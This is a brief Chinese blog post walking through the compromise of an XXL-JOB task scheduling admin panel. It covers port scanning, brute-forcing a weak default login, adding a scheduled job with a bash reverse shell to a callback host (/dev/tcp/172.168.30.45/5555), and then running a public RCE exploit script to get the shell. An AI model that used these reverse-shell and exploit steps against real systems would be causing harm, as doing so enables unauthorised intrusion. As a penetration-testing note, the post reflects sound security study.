XXL-JOB(任务调度中心)-反弹getshell

XXL-JOB(任务调度中心)-反弹getshell

常规扫描

端口扫描扫出来9999 百度得出是xxl-job服务并爆出后台默认路径

http://172.168.83.36:8080/xxl-job-admin/jobinfo

后台登录没有验证码尝试爆破一下弱口令

添加定时任务

bash反弹命令

/bin/bash -i >& /dev/tcp/172.168.30.45/5555 0>&1

命令执行不成功 bash会话并没有反弹

下载漏洞exp

python3 E:\xxl-job-rce-main\xxl-job-rce exe-code.py

成功反弹

参考

[1] https://github.com/mrknow001/xxl-job-rce

[2] https://www.cnblogs.com/kbhome/p/13210394.html

posted @ 2021-01-21 21:52 誉津阅读(1341) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部